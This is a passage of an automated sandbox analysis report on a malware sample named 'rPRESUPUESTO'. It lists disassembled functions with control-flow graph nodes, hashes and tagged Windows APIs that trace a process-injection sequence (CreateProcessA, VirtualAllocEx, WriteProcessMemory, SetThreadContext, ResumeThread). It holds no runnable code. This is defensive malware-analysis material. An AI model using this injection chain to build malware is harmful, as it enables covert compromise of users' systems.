78796ed 636->644 645 78796f0-78796f8 643->645 644->645 645->588
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 08a553d426504c96e7b692e449777d1806a168f7d22931ff89e99fb7d2db0f54
                                                • Instruction ID: fbe0c9227e3f02e48ff005b053d9096b6a016c09f2ebcb6abe54d23e7ad257e4
                                                • Opcode Fuzzy Hash: 08a553d426504c96e7b692e449777d1806a168f7d22931ff89e99fb7d2db0f54
                                                • Instruction Fuzzy Hash: D7716BB0E042198FCB14DFA9C5806AEFBF2FF89304F24816AD419AB255D734A941CFA0
                                                Function 0787D2F8 Relevance: .6, Instructions: 621COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e35665d3952e9e159983695c1f180ea159f18e384812f5bb389f934be3f8c77a
                                                • Instruction ID: a5178dae99b3a061f4517b38d726d9ae6e45e6a0861dec75d406af71b8b7d01c
                                                • Opcode Fuzzy Hash: e35665d3952e9e159983695c1f180ea159f18e384812f5bb389f934be3f8c77a
                                                • Instruction Fuzzy Hash: 6832BBB0B016059FDB19DF69D450BAEBBF6AF99304F1484A9E106DB3A0CB35ED01CB61
                                                Function 07874320 Relevance: .1, Instructions: 64COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c633e2972f2878bb0e1e9f49c78eec9377bfc5fc4e3df42c69fa3b8ff45c7867
                                                • Instruction ID: 76485e31b81411db800d09bc9ec5324707be5f6dfc53d934b876c5cf3885d6a5
                                                • Opcode Fuzzy Hash: c633e2972f2878bb0e1e9f49c78eec9377bfc5fc4e3df42c69fa3b8ff45c7867
                                                • Instruction Fuzzy Hash: 3F21F5B0D056589BEB18CFABC8447DEBFF6AFC9300F14C06AD409AA254DB740945CF61
                                                Function 07872AC1 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2888d06acf4b735c90f184be936145134835cd13c8a70833e1bad95143b5bedb
                                                • Instruction ID: 3586ecbc1ef7b2335d29beccc32493295516172d092db011256648689f43385a
                                                • Opcode Fuzzy Hash: 2888d06acf4b735c90f184be936145134835cd13c8a70833e1bad95143b5bedb
                                                • Instruction Fuzzy Hash: DA21BCB1D046189BEB18CF6BD84069ABAF7AFC9300F04C0BA9509A6665DB345641CF52
                                                Function 07879B2C Relevance: 1.8, APIs: 1, Instructions: 282processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 390 7879b2c-7879b31 391 7879b33-7879bcd 390->391 392 7879abb-7879af2 390->392 396 7879c06-7879c26 391->396 397 7879bcf-7879bd9 391->397 408 7879af4-7879afa 392->408 409 7879afb-7879b20 392->409 404 7879c5f-7879c8e 396->404 405 7879c28-7879c32 396->405 397->396 399 7879bdb-7879bdd 397->399 400 7879c00-7879c03 399->400 401 7879bdf-7879be9 399->401 400->396 406 7879bed-7879bfc 401->406 407 7879beb 401->407 419 7879cc7-7879d81 CreateProcessA 404->419 420 7879c90-7879c9a 404->420 405->404 410 7879c34-7879c36 405->410 406->406 411 7879bfe 406->411 407->406 408->409 412 7879c59-7879c5c 410->412 413 7879c38-7879c42 410->413 411->400 412->404 417 7879c46-7879c55 413->417 418 7879c44 413->418 417->417 422 7879c57 417->422 418->417 432 7879d83-7879d89 419->432 433 7879d8a-7879e10 419->433 420->419 423 7879c9c-7879c9e 420->423 422->412 425 7879cc1-7879cc4 423->425 426 7879ca0-7879caa 423->426 425->419 427 7879cae-7879cbd 426->427 428 7879cac 426->428 427->427 430 7879cbf 427->430 428->427 430->425 432->433 443 7879e12-7879e16 433->443 444 7879e20-7879e24 433->444 443->444 445 7879e18 443->445 446 7879e26-7879e2a 444->446 447 7879e34-7879e38 444->447 445->444 446->447 448 7879e2c 446->448 449 7879e3a-7879e3e 447->449 450 7879e48-7879e4c 447->450 448->447 449->450 451 7879e40 449->451 452 7879e5e-7879e65 450->452 453 7879e4e-7879e54 450->453 451->450 454 7879e67-7879e76 452->454 455 7879e7c 452->455 453->452 454->455 457 7879e7d 455->457 457->457
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07879D6E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 25a16075f0f2f982372484f05c46d9c48db56eb77efc077391c866c90d2a9777
                                                • Instruction ID: 8e9eb69daebcddfa4779fc59c2364dc4f56d73e48003336d35e3dfe939631363
                                                • Opcode Fuzzy Hash: 25a16075f0f2f982372484f05c46d9c48db56eb77efc077391c866c90d2a9777
                                                • Instruction Fuzzy Hash: 43B16BB1D0021A8FDF14CF68C841BEEBBF2AF98310F148169D80AE7250DB74A985CF91
                                                Function 07879B38 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 458 7879b38-7879bcd 460 7879c06-7879c26 458->460 461 7879bcf-7879bd9 458->461 466 7879c5f-7879c8e 460->466 467 7879c28-7879c32 460->467 461->460 462 7879bdb-7879bdd 461->462 463 7879c00-7879c03 462->463 464 7879bdf-7879be9 462->464 463->460 468 7879bed-7879bfc 464->468 469 7879beb 464->469 477 7879cc7-7879d81 CreateProcessA 466->477 478 7879c90-7879c9a 466->478 467->466 470 7879c34-7879c36 467->470 468->468 471 7879bfe 468->471 469->468 472 7879c59-7879c5c 470->472 473 7879c38-7879c42 470->473 471->463 472->466 475 7879c46-7879c55 473->475 476 7879c44 473->476 475->475 479 7879c57 475->479 476->475 489 7879d83-7879d89 477->489 490 7879d8a-7879e10 477->490 478->477 480 7879c9c-7879c9e 478->480 479->472 482 7879cc1-7879cc4 480->482 483 7879ca0-7879caa 480->483 482->477 484 7879cae-7879cbd 483->484 485 7879cac 483->485 484->484 487 7879cbf 484->487 485->484 487->482 489->490 500 7879e12-7879e16 490->500 501 7879e20-7879e24 490->501 500->501 502 7879e18 500->502 503 7879e26-7879e2a 501->503 504 7879e34-7879e38 501->504 502->501 503->504 505 7879e2c 503->505 506 7879e3a-7879e3e 504->506 507 7879e48-7879e4c 504->507 505->504 506->507 508 7879e40 506->508 509 7879e5e-7879e65 507->509 510 7879e4e-7879e54 507->510 508->507 511 7879e67-7879e76 509->511 512 7879e7c 509->512 510->509 511->512 514 7879e7d 512->514 514->514
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07879D6E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 0344eeb3db8704612a0767bf32164401d19ae82efe49891cb65f7bacaf35e5ce
                                                • Instruction ID: 817f8c1979b330e3afda3aad7ad6eaebd26275b52335721e3175224145d9959c
                                                • Opcode Fuzzy Hash: 0344eeb3db8704612a0767bf32164401d19ae82efe49891cb65f7bacaf35e5ce
                                                • Instruction Fuzzy Hash: 19914AB1D0061A8FDF14CF68C841B9DBBF2AF98310F1481A9D81AE7290DB75A985CF91
                                                Function 0110B148 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 515 110b148-110b157 516 110b183-110b187 515->516 517 110b159-110b166 call 1109bb8 515->517 519 110b189-110b193 516->519 520 110b19b-110b1dc 516->520 523 110b168 517->523 524 110b17c 517->524 519->520 526 110b1e9-110b1f7 520->526 527 110b1de-110b1e6 520->527 570 110b16e call 110b3e0 523->570 571 110b16e call 110b3d1 523->571 524->516 528 110b1f9-110b1fe 526->528 529 110b21b-110b21d 526->529 527->526 531 110b200-110b207 call 110ae00 528->531 532 110b209 528->532 534 110b220-110b227 529->534 530 110b174-110b176 530->524 533 110b2b8-110b378 530->533 536 110b20b-110b219 531->536 532->536 565 110b380-110b3ab GetModuleHandleW 533->565 566 110b37a-110b37d 533->566 537 110b234-110b23b 534->537 538 110b229-110b231 534->538 536->534 539 110b248-110b251 call 110ae10 537->539 540 110b23d-110b245 537->540 538->537 546 110b253-110b25b 539->546 547 110b25e-110b263 539->547 540->539 546->547 548 110b281-110b28e 547->548 549 110b265-110b26c 547->549 556 110b290-110b2ae 548->556 557 110b2b1-110b2b7 548->557 549->548 551 110b26e-110b27e call 110ae20 call 110ae30 549->551 551->548 556->557 567 110b3b4-110b3c8 565->567 568 110b3ad-110b3b3 565->568 566->565 568->567 570->530 571->530
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0110B39E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 13dc6dbad2cb8452cb10700b71d6719051ef450ccc259459e0fd97597cd748c7
                                                • Instruction ID: 2bf9eea2e71a87b5eeed8c19e2a73a3e6f89aa0fc45839d72afeba3030dc6cab
                                                • Opcode Fuzzy Hash: 13dc6dbad2cb8452cb10700b71d6719051ef450ccc259459e0fd97597cd748c7
                                                • Instruction Fuzzy Hash: 267145B4A00B058FDB69DF29D44479ABBF1FF88304F00892DD44AD7A80D7B4E945CB94
                                                Function 011044C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 647 11044c4-11059d9 CreateActCtxA 650 11059e2-1105a3c 647->650 651 11059db-11059e1 647->651 658 1105a4b-1105a4f 650->658 659 1105a3e-1105a41 650->659 651->650 660 1105a60 658->660 661 1105a51-1105a5d 658->661 659->658 663 1105a61 660->663 661->660 663->663
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 011059C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 6e2065973cd23196872e8b8adb553214da1528fdcabc9729f5a47dd3f5465819
                                                • Instruction ID: 4a725b19016ae2e4a477a01f17679513cb39cefd59f91e700ad1278728f28945
                                                • Opcode Fuzzy Hash: 6e2065973cd23196872e8b8adb553214da1528fdcabc9729f5a47dd3f5465819
                                                • Instruction Fuzzy Hash: 0641D4B1C0071DCBDB25CFA9C844B9EBBF6BF49304F24816AD508AB251DBB56945CF90
                                                Function 0110590C Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 664 110590c-11059d9 CreateActCtxA 666 11059e2-1105a3c 664->666 667 11059db-11059e1 664->667 674 1105a4b-1105a4f 666->674 675 1105a3e-1105a41 666->675 667->666 676 1105a60 674->676 677 1105a51-1105a5d 674->677 675->674 679 1105a61 676->679 677->676 679->679
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 011059C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 6690f8b3cbbfb6bb32bd03f048c73a8d689b7d9649557ffd9df7b88d8ec903fd
                                                • Instruction ID: 669a3ba19967891413e136469f90f73411afefec06711bb2cc8eb12e36984d84
                                                • Opcode Fuzzy Hash: 6690f8b3cbbfb6bb32bd03f048c73a8d689b7d9649557ffd9df7b88d8ec903fd
                                                • Instruction Fuzzy Hash: F141E3B1C00719CFDB25CFA9C884B9DBBF6BF48304F24816AD508AB251DB756949CF50
                                                Function 0110B018 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 680 110b018-110b03b 682 110d608-110d69c DuplicateHandle 680->682 683 110d6a5-110d6c2 682->683 684 110d69e-110d6a4 682->684 684->683
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0110D5CE,?,?,?,?,?), ref: 0110D68F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 50a86fd6cea1c096f99142a84bb2ea2525b62a4fd4729a744dc9e8f4bab1d653
                                                • Instruction ID: f5fe0a3226a9dd5a215ee92db9072f21d98ee366968652db6cefd17b8e8581ff
                                                • Opcode Fuzzy Hash: 50a86fd6cea1c096f99142a84bb2ea2525b62a4fd4729a744dc9e8f4bab1d653
                                                • Instruction Fuzzy Hash: 183143B5C04349DFDB10CFAAD884ADEBFF8EB49320F14801AE958A3251C374A944CFA5
                                                Function 078798A8 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 687 78798a8-78798fe 690 7879900-787990c 687->690 691 787990e-787994d WriteProcessMemory 687->691 690->691 693 7879956-7879986 691->693 694 787994f-7879955 691->694 694->693
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07879940
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: ddb01bddb8e67b8e121da7460bb80d0a89b3728d288b93ee96e60a959065bfde
                                                • Instruction ID: f9a7e0bbdee6660bc91974243f757d0b20158c77865e2db07301dab627f22819
                                                • Opcode Fuzzy Hash: ddb01bddb8e67b8e121da7460bb80d0a89b3728d288b93ee96e60a959065bfde
                                                • Instruction Fuzzy Hash: E02148B190035A9FDB10CFA9C880BEEBFF5FF48320F10842AE959A7241D7749954CB64
                                                Function 078798B0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 698 78798b0-78798fe 700 7879900-787990c 698->700 701 787990e-787994d WriteProcessMemory 698->701 700->701 703 7879956-7879986 701->703 704 787994f-7879955 701->704 704->703
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07879940
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: cdc711687bfea5ed9377e012e99e8f7492e35374657ca830c7643d5b4fdd7aa8
                                                • Instruction ID: c22fe73112f14d59e90eb0d9dc6f0564e096b21f8169601a8a272be6df9f2411
                                                • Opcode Fuzzy Hash: cdc711687bfea5ed9377e012e99e8f7492e35374657ca830c7643d5b4fdd7aa8
                                                • Instruction Fuzzy Hash: 782127B59003199FDB10CFA9C885BDEBBF5FF48320F10842AE959A7240D778A944DBA4
                                                Function 07879710 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 708 7879710-7879763 710 7879765-7879771 708->710 711 7879773-78797a3 Wow64SetThreadContext 708->711 710->711 713 78797a5-78797ab 711->713 714 78797ac-78797dc 711->714 713->714
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07879796
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 243dd8668289e4f2f07191d13f6ea87c8a5f50a9b574b4c19dcb58a72b55d858
                                                • Instruction ID: 28a26025e9b7bd49906aa53da9baacb0e50dbad13ab4b823d2d992d0886f86b2
                                                • Opcode Fuzzy Hash: 243dd8668289e4f2f07191d13f6ea87c8a5f50a9b574b4c19dcb58a72b55d858
                                                • Instruction Fuzzy Hash: 902179B5D002098FDB10CFA9C484BEEBFF4EF98320F14842AD519A7241CB78A944CFA4
                                                Function 07879998 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 718 7879998-7879a2d ReadProcessMemory 723 7879a36-7879a66 718->723 724 7879a2f-7879a35 718->724 724->723
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07879A20
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 788de0856d4cde459d4c4b2322ef9f35edd4326bb022847e4045d98531239cad
                                                • Instruction ID: cff014cbcb5add8d8ecb01f1efbcd5391bc160c656aec24352c950b57e3de7fc
                                                • Opcode Fuzzy Hash: 788de0856d4cde459d4c4b2322ef9f35edd4326bb022847e4045d98531239cad
                                                • Instruction Fuzzy Hash: B5212AB1C003599FDB10CFAAC881AEEFBF5FF58310F10842AE959A7240DB399944DB64
                                                Function 0110B034 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0110D5CE,?,?,?,?,?), ref: 0110D68F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: bc94a2c2f531ec40e5f792430ab8f462477ca565d3e843d95f5dae53b624ccd9
                                                • Instruction ID: ce965252e38cc05057740d5899cab74f1747ce80b8b078a3d4795ce5d5758631
                                                • Opcode Fuzzy Hash: bc94a2c2f531ec40e5f792430ab8f462477ca565d3e843d95f5dae53b624ccd9
                                                • Instruction Fuzzy Hash: 1021E3B5D002499FDB10CFAAD984ADEFFF8EB48310F14841AE918A3350D374A950CFA5
                                                Function 0110D601 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0110D5CE,?,?,?,?,?), ref: 0110D68F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 2c0af727be1a05ff6e3893c3c5e949cf9d86d2e01fd778f8e9be3f52ce54b7d1
                                                • Instruction ID: c4f4023d743768952fbd8d01e7671f952ac4841d3bef76ad4fe591b57913c5e7
                                                • Opcode Fuzzy Hash: 2c0af727be1a05ff6e3893c3c5e949cf9d86d2e01fd778f8e9be3f52ce54b7d1
                                                • Instruction Fuzzy Hash: F821E4B5D002499FDB14CFA9D984ADEBBF4FB48310F14841AE918A3250D378A944CF64
                                                Function 07879718 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07879796
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 4104711c3e1e8425dd1aae614f01e41a2f06a3b825eb0bd6f57c99f73618e810
                                                • Instruction ID: 3783a0b67633231b33f2e4ab11f2defd8af501b7811d015ebea3cb16dc1a030c
                                                • Opcode Fuzzy Hash: 4104711c3e1e8425dd1aae614f01e41a2f06a3b825eb0bd6f57c99f73618e810
                                                • Instruction Fuzzy Hash: 3F215BB5D003098FDB10DFAAC4857EEBBF4EF98320F14842AD519A7241DB78A944CFA4
                                                Function 078799A0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07879A20
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 0a89cdf1897636949f1b2851503be9f29cedbb9e5be10898516e6d55f1be2ff9
                                                • Instruction ID: 906dfce522a1346157086a4f798deab051eb9e4f46beb1b7b01660ccabae2a1e
                                                • Opcode Fuzzy Hash: 0a89cdf1897636949f1b2851503be9f29cedbb9e5be10898516e6d55f1be2ff9
                                                • Instruction Fuzzy Hash: 70213CB1C003599FDB10CFAAC881ADEFBF5FF48310F108429E959A7240D7359944DB64
                                                Function 078797E8 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0787985E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 5f4c250e3294bd87d13cbfd42a4f85390d61d2d57db0820a0e1f8eacbcc856bc
                                                • Instruction ID: b3f3f02b24d03c1481d7700a594b34149cfef1896a4460d7cb6985a93c02c9b8
                                                • Opcode Fuzzy Hash: 5f4c250e3294bd87d13cbfd42a4f85390d61d2d57db0820a0e1f8eacbcc856bc
                                                • Instruction Fuzzy Hash: F4114AB28002098FDB10DFA9C8446EFBBF5EF98320F248419D519A7250C7359944CFA0
                                                Function 0110AE58 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0110B419,00000800,00000000,00000000), ref: 0110B60A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 8e32b6c685424f57a4f7be3579936d53e51ea74eb14d03815faec1c257201db3
                                                • Instruction ID: 444284bf22d74bc4e830e4adfc1da216532e5b62470604bf3d49becb4723728d
                                                • Opcode Fuzzy Hash: 8e32b6c685424f57a4f7be3579936d53e51ea74eb14d03815faec1c257201db3
                                                • Instruction Fuzzy Hash: 651117B6C043099FDB14CF9AC844A9EFBF4EB88310F14841AD519B7240C375A544CFA9
                                                Function 078797F0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0787985E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 1dcf911bd8fb74ea1fef265badcc04132d91e86b828420cbc0f52da1c8919cfa
                                                • Instruction ID: 6b3b0917fc5ea4d402971e2264361b3ff0b0b0d4b151a8c0d9d99a41a5d54123
                                                • Opcode Fuzzy Hash: 1dcf911bd8fb74ea1fef265badcc04132d91e86b828420cbc0f52da1c8919cfa
                                                • Instruction Fuzzy Hash: 031167B28002099FCB10CFAAC844ADEBFF5EF88320F148419E519A7250CB35A940CFA0
                                                Function 0110B59B Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0110B419,00000800,00000000,00000000), ref: 0110B60A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2154039735.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1100000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 9cadcf623def07e7310d59b19df457198a6771ad1c19981b78a0900355b855ca
                                                • Instruction ID: f53a143d0278ff03b3187574cc75ebf1f269985dd54629714a2470996d59b28a
                                                • Opcode Fuzzy Hash: 9cadcf623def07e7310d59b19df457198a6771ad1c19981b78a0900355b855ca
                                                • Instruction Fuzzy Hash: 511123BAC002098FDB15CFAAC944ADEFBF4EB88310F14841ED919B7240C375A545CFA4
                                                Function 0787922B Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2171629354.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7870000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 3c0ee0e8b51700b274b4ea2ba913b6fba72d8dbde4f07c0d5d812f406072eb2a
